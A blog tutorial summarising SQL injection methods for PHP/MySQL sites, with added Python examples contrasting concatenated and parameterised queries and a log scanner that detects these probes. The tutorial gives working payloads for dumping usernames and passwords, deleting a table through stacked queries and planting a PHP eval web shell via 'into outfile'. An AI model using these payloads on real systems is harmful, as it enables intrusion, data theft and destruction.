
Summary of SQL injection (I)

2022-06-25 04:53:00 Key_ Words

Part 1: Conventional injection (query results are echoed to the front end)

Step 1: Test the data type

1. Numeric

id=1 and 1=1    the page displays normally
id=1 and 1=2    the page breaks

2. Character (string)

id=1' and '1'='1    the page displays normally
id=1' and '1'='2    the page breaks

3. Sleep-based check (use when the data is not echoed to the front end)

id=1' and sleep(10)--+    the page stalls for 10 seconds, which shows the condition was evaluated

4. Common ways developers receive the parameter

Numeric:                              id=$id

Character:                            id='$id'

Brackets + single quotes:             id=('$id')

Brackets + double quotes:             id=("$id")

Double brackets + single quotes:      id=(('$id'))

5. Note the comment sequences used when injecting: --+ and # are used interchangeably
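An added example, not code from the post: it reproduces step 1 against an in-memory SQLite table, assuming the receiving patterns listed above are built by pasting the parameter into the query text, and sets the bound-parameter form beside them to show what the fix changes (the table, rows and function names are constructed for this illustration).

```python
import sqlite3

# Constructed stand-in for the target the post probes (not the post's code): an
# in-memory SQLite table looked up by the ?id= parameter, so no MySQL is needed.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?)",
                    [(1, "apple"), (2, "pear"), (3, "plum")])
    return con

# The receiving patterns listed above: the parameter is pasted into the SQL text,
# so "1 and 1=2" or "1' and '1'='2" becomes part of the WHERE clause.
VULNERABLE = {
    "numeric": "SELECT name FROM products WHERE id={v}",
    "string":  "SELECT name FROM products WHERE id='{v}'",
    "bracket": "SELECT name FROM products WHERE id=('{v}')",
}

def lookup_concat(con, pattern, value):
    # Vulnerable: whatever condition the parameter carries is executed.
    return [r[0] for r in con.execute(VULNERABLE[pattern].format(v=value))]

def lookup_param(con, value):
    # Fixed: a bound parameter is compared as a value and never parsed as SQL.
    sql = "SELECT name FROM products WHERE id=?"
    return [r[0] for r in con.execute(sql, (value,))]

def probe(con):
    # Step 1 from the post: does the result differ between the 1=1 and 1=2 cases?
    # A differing pair is the "page normal / page broken" signal described above.
    pairs = {
        "numeric": ("1 and 1=1", "1 and 1=2"),
        "string":  ("1' and '1'='1", "1' and '1'='2"),
        "bracket": ("1') and ('1'='1", "1') and ('1'='2"),
    }
    report = {name: (lookup_concat(con, name, yes), lookup_concat(con, name, no))
              for name, (yes, no) in pairs.items()}
    report["param"] = (lookup_param(con, "1 and 1=1"), lookup_param(con, "1 and 1=2"))
    return report

def injectable(report):
    # Names of the patterns whose two cases gave different results.
    return sorted(name for name, (yes, no) in report.items() if yes != no)
```

The bound-parameter lookup returns the same (empty) result for both cases, so the step 1 signal disappears once the parameter is no longer part of the SQL text.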

Step 2: Start injecting

The following uses a MySQL database with an integer-typed parameter as the demonstration case.

1. Guess the number of fields (find the threshold between the page showing an error and displaying normally)

?id=1 order by 4

2. Preparation for guessing (a union query that shows which columns are echoed)

?id=-1 union select 1,2,3,4

3. Information gathering

Database version:        version()

Database name:           database()

Database user:           user()

Operating system:        @@version_compile_os

Database path:           @@datadir or @@basedir

4. Get the table names (using the database name obtained in the previous step)

Query the table names in the database dvwa:
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='dvwa'

5. Get the column names (using the table name obtained in the previous step)

Query the column names in the table GJC:
?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='GJC'

6. Get the data

Query the data in the table:
?id=1 union select 1,name,password,4 from GJC

Part 2: Blind injection (data is not echoed to the front end)

1. Error-based SQL injection

2. Boolean-based SQL injection (note the use of binary search)

We construct a condition such as (length(database()) = 8) and check whether the target satisfies it: if it does, the query succeeds; if not, it fails. database() is the name of the current database and length(database()) is the length of that name; the comparisons greater than, equal to and less than are used to test the condition, and the value is guessed step by step in this way.


3. Time-based SQL injection

Part 3: File injection (writing files)

Precondition: the absolute path of the website must be found first. (Ways to obtain it: error messages, Google dorks such as site:target-site, leftover files such as phpinfo, paths exposed by vulnerabilities, reading configuration files.)

1. First determine whether the filtering is numeric or character-based

2. Start writing the file (although the page reports an error, the file has been written successfully)

?id=1')) union select 1,2,3 into outfile "D:\\phpStudy\\ Other paths \\" --+

A one-line script can be written directly into the file:

?id=1')) union select 1,2,'<?php @eval($_post["mima"])?>' into outfile "D:\\phpStudy\\ Other paths \\yijuhua.php" --+

Part 4: Injection through other submitted fields

1. SQL injection in the login and registration forms

Judge whether the account (username) or the password (password) field is the better injection point.

2. User-Agent injection

Capture the HTTP request headers and modify the User-Agent value to perform SQL injection.

3. Referer injection

Capture the HTTP request headers and modify the Referer value to perform SQL injection.

4. Cookie injection

Capture the HTTP request headers and modify the Cookie value to perform SQL injection.

(After logging in the first time, save the cookie and log out; on the next login, modify the cookie value to perform the injection.)

Part 5: Injection extensions

1. Second-order injection

Principle of second-order injection: when data is first inserted into the database, addslashes or get_magic_quotes_gpc is used to escape special characters. A characteristic of addslashes is that although it adds a backslash ("\") in front of the filtered characters, the backslash itself is not stored: the original data is written to the database unchanged.
Once the data is in the database, developers treat it as trusted. The next time it is needed, the dirty data is pulled straight out of the database and used without further checking, which causes a second SQL injection. For example, data containing a single quote is inserted directly into the database the first time; when it is used again later, for instance during a modification, a second-order injection is formed.
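An added example, not code from the post, showing the second-order case just described on an in-memory SQLite table: the registration step stores the name safely (a bound parameter leaves the quote in the stored value, which is the end state the post attributes to addslashes in MySQL), and a later "change password" step reuses the stored value. The table, user names and function names are constructed for this illustration.

```python
import sqlite3

# Constructed in-memory stand-in for the post's scenario (not the post's code).
# Registration stores the name safely; a later "change password" step trusts the
# stored value and pastes it into SQL text, which is the second injection.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'secret')")
    return con

def register(con, name, pw):
    # A bound parameter (like addslashes in the post's MySQL case) protects only
    # this statement: the quote inside the name is stored exactly as typed.
    con.execute("INSERT INTO users VALUES (?, ?)", (name, pw))

def change_pw_vulnerable(con, name, old_pw, new_pw):
    # The name came back from the database, so it is treated as trusted and
    # concatenated. With name = "admin'--" the WHERE clause ends after 'admin'.
    con.execute(f"UPDATE users SET pw='{new_pw}' "
                f"WHERE name='{name}' AND pw='{old_pw}'")

def change_pw_fixed(con, name, old_pw, new_pw):
    # Data read back from the database is still data: bind it again.
    con.execute("UPDATE users SET pw=? WHERE name=? AND pw=?",
                (new_pw, name, old_pw))

def password_of(con, name):
    row = con.execute("SELECT pw FROM users WHERE name=?", (name,)).fetchone()
    return row[0] if row else None

def scenario(fixed):
    # Returns (admin's password, attacker's password) after the attacker changes
    # their own password; the vulnerable path changes admin's instead.
    con = make_db()
    attacker = "admin'--"   # SQLite reads -- as a comment to end of line
    register(con, attacker, "x")
    stored = con.execute("SELECT name FROM users WHERE name=?",
                         (attacker,)).fetchone()[0]
    change = change_pw_fixed if fixed else change_pw_vulnerable
    change(con, stored, "x", "changed")
    return password_of(con, "admin"), password_of(con, attacker)
```

MySQL only treats -- as a comment when whitespace follows it, so the exact stored value that triggers the second query differs by database; the defect is the same.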

2. Encryption/decryption injection

Principle of encryption/decryption injection: the GET or POST parameter is encoded with base64 or a similar scheme before being passed to the server, e.g. www.xxx.com/index.php?id=MQ==
Encoded part: MQ==
Decoded result: 1, equivalent to id=1
To inject, construct the statement first, then base64-encode it:
id=1 and 1=1
base64 result: MSBhbmQgMT0x
Request: www.xxx.com/index.php?id=MSBhbmQgMT0x

3. DNSlog out-of-band injection (proxy pool)

Why use DNSlog injection: normally, when data cannot be retrieved directly through a union query, only blind injection is left and the data is obtained step by step. Blind injection by hand takes time, and you might think of running sqlmap to pull the data directly, but in real tests running blind injection with sqlmap is very likely to get your IP blocked by the website, which slows the test down. A proxy pool may help.

4. Stacked injection

Limitation: only some databases support it

Principle: on the MySQL command line each statement ends with ; so the question is whether several statements can be used together. (Benefit: no need to worry about encryption.)

For example: select * from products where prodictid=1;delete from products

When the query runs, the first statement returns the query results and the second deletes the whole table.

5. Wide-byte injection

When PHP connects to MySQL with "set character_set_client = gbk", a character-set conversion problem arises, which is the familiar wide-byte injection. When wide-byte injection exists, sending the injection parameter %df%27 lets the %df byte "eat" the escaping backslash (%5c). For example: id=1%df' and 1=1%23

6. Others ...

Note: the above does not take into account WAF protection on the target side!
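An added log-triage example, not code from the post, that looks in request parameters and headers for the probes this summary describes, including the base64-encoded and wide-byte forms from Part 5 and the header fields from Part 4; the signatures and sample log lines are constructed for this illustration and are deliberately crude, for triage rather than blocking.

```python
import base64
import re
from urllib.parse import unquote_plus, urlsplit
# Crude signatures for the probes this summary covers (constructed for triage, not blocking).
SIGNATURES = {
    "boolean-test":  re.compile(r"\band\s+'?1'?\s*=\s*'?[12]'?", re.I),
    "time-delay":    re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "union-select":  re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "file-write":    re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "stacked-query": re.compile(r";\s*(delete|drop|update|insert)\b", re.I),
}
# Raw (still percent-encoded) check for the lead byte of Part 5's wide-byte payload.
WIDE_BYTE = re.compile(r"%(df|bf)(%27|')", re.I)

def decoded_views(value):
    # The value as received, then its base64 decoding (Part 5's id=MSBhbmQgMT0x).
    yield value
    try:
        text = base64.b64decode(value + "=" * (-len(value) % 4), validate=True).decode()
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return
    if text.isprintable():
        yield text

def scan_fields(fields):
    # fields: name -> raw value (query params or Part 4's User-Agent/Referer/Cookie).
    hits = set()
    for raw in fields.values():
        if WIDE_BYTE.search(raw):
            hits.add("wide-byte")
        for view in decoded_views(unquote_plus(raw)):
            hits.update(n for n, rx in SIGNATURES.items() if rx.search(view))
    return hits

def scan_log(text):
    # 'METHOD /path?query' lines -> [(line, sorted hits)] for the lines that hit.
    findings = []
    for line in text.splitlines():
        query = urlsplit(line.split()[1]).query
        fields = dict(p.partition("=")[::2] for p in query.split("&") if p)
        if hits := scan_fields(fields):
            findings.append((line, sorted(hits)))
    return findings

# Constructed sample entries mirroring the probes above (not real traffic).
SAMPLE_LOG = """GET /index.php?id=1%20and%201=2
GET /index.php?id=1'%20and%20sleep(10)--+
GET /index.php?id=MSBhbmQgMT0x
GET /index.php?id=1%df'%20and%201=1%23
GET /index.php?id=1;delete%20from%20products"""
```

Decoding each value before matching is what catches the MSBhbmQgMT0x form; the wide-byte check runs on the raw value because the %df byte is lost once it is percent-decoded.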


Copyright notice: this article was written by Key_ Words; please include the link to the original when reposting. Thanks.
https://yzsam.com/2022/02/202202210532515738.html